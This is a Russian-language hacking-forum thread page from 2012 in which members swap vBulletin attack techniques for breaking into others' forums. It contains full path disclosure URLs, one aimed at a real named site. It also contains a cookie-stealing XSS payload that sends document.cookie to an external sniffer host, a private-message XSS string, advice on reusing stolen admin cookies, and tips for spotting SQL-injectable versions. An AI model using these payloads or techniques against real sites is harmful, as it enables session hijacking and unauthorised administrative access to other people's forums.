HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Обзор уязвимостей vBulletin]
   
Ответ
Страница 13 из 17 « Первая < 3 9 10 11 12 13 14 15 16 17 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.01.2012, 23:12
eman
Новичок
Регистрация: 07.11.2010
Сообщений: 8
С нами: 8164406

Репутация: 0
По умолчанию
Цитата:
Сообщение от Fooog  
Обычно (90%) в нижнем углу написано "Администрирование".
Клацните туда и попадете в админку.
Поправлю вас, "Управление"

Цитата:
Сообщение от Cherep  
уже попытался, та нихера, видать говнари-админы тупо не сменили пути в исходнике
Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.01.2012, 22:03
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами: 8395350

Репутация: 0
По умолчанию
Цитата:
Сообщение от eman  
Поправлю вас, "Управление"
Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)
как я понял, в конфиге она не прописана Мб её вообще стерли нахер
 
Ответить с цитированием

  #3  
Старый 27.01.2012, 01:10
-morfiy-
Новичок
Регистрация: 08.02.2010
Сообщений: 1
С нами: 8554841

Репутация: 0
По умолчанию
зайдите под админом, дождитесь админа и посмотрите пути админки через "кто на сайте"
 
Ответить с цитированием

  #4  
Старый 10.02.2012, 22:05
eman
Новичок
Регистрация: 07.11.2010
Сообщений: 8
С нами: 8164406

Репутация: 0
По умолчанию
vBulletin 4.1.10 Full Path Disclosure

[Info]

# Author: linc0ln.dll

# Exploit Title: vBulletin 4.1.10 Full Path Disclosure

# Date: 16/01/2012

# Vendor or Software Link: http://www.vbulletin.com/# Category: WebApp

# Version: 4.1.10

# Contact: linc@tormail.net

# Website: linc6.wordpress.com

# Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |VoltroN | amiugly | b00y4k4 |

[Vulnerability]

# Full Path Disclosure:

Цитата:
Сообщение от None  
http://localhost/path/forumdisplay.php?do[]=linc0ln.dll
Цитата:
Сообщение от None  
http://localhost/path/calendar.php?do[]=linc0ln.dll
Цитата:
Сообщение от None  
http://localhost/path/search.php?do[]=linc0ln.dll
demo

Цитата:
Сообщение от None  
https://forum.4game.ru/forumdisplay.php?do[]=linc0ln.dll
 
Ответить с цитированием

  #5  
Старый 11.02.2012, 09:16
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию
Цитата:
Сообщение от Melo  
что дает нам это уязвимость?
Написано же "Full Path Disclosure". Раскрытие пути к скрипту на сервере.
 
Ответить с цитированием

  #6  
Старый 29.02.2012, 04:17
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию
АктивнаяXSS

Уязвимы все версий

Требуются права модератора

Идём

Панель модератора -> Управление разделами -> Объявление [Редактировать]

Рабочий пример (проверка на работоспособность)

Цитата:
Сообщение от None  

Эксплуатация обычная

Цитата:
Сообщение от None  
img = new Image(); img.src = "http://sniffer.ru/s.php?"+document.cookie;
 
Ответить с цитированием

  #7  
Старый 06.03.2012, 17:55
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию
Цитата:
Сообщение от OxoTnik  
Активная
XSS
Уязвимы все версий
Требуются права модератора
Идём
Панель модератора -> Управление разделами -> Объявление [
Редактировать
]
Рабочий пример (проверка на работоспособность)
Эксплуатация обычная
Америку открыл. Это не XSS, а фича. На ачате тоже работает.
 
Ответить с цитированием

  #8  
Старый 16.03.2012, 15:56
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от Spunoff  
Если получить куки админа форума, в админку же всё равно будет повторно требоватся ввод пароля? Это можно обойти?
если админ заходил в admincp до этого, то куки будут с админкой, правда они не долго живут.
 
Ответить с цитированием

  #9  
Старый 18.03.2012, 21:49
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию
Цитата:
Сообщение от pharm_all  
4.1.4 есть что-то может народ? 4.1.0-4.1.3 уже прикрыли скуль , может есть что-то в привате под новые версии рассмотрел бы . Пишите в личку!
В 4.1.4 тоже SQL-inj есть. Смотри Patchlevel в vbulletin_global.js. Если там просто "Vbulletin 4.1.4", то радуйся. А если рядом написано "Patchlevel n", то можешь др. способы искать.
 
Ответить с цитированием

  #10  
Старый 28.03.2012, 05:23
pharm_all
Познающий
Регистрация: 10.09.2009
Сообщений: 40
С нами: 8772921

Репутация: 1
По умолчанию
vBulletin 4.1.7 => 4.1.10 XSS Vulnerability

Vulnerability:

1.

Send New Private Message >

>

Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)

Watch the video: [http://vimeo.com/39049790]

1337day.com/exploits/17824
 
Ответить с цитированием
Ответ
Страница 13 из 17 « Первая < 3 9 10 11 12 13 14 15 16 17 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.